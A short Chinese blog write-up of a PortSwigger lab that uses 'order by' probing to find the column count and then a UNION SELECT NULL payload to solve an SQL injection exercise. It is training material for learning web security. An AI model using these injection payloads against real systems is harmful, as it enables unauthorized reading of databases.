burpsuite靶场----SQL注入6----order by注出列数

靶场地址

https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns

正式开始

' order by 3-- 没报错
' order by 4-- 报错了
说明列数有三列

2.然后使用联合查询
' union select NULL,NULL,NULL--
成功通关
ps:不知为什么'
' union select 1,2,3--
' union select 'a','b','c'--
也报错了

posted @ 2023-08-15 13:29 BattleofZhongDinghe 阅读(23) 评论(0) 编辑收藏举报

刷新页面返回顶部

thebeastofwar

burpsuite靶场----SQL注入6----order by注出列数

burpsuite靶场----SQL注入6----order by注出列数

靶场地址

正式开始

公告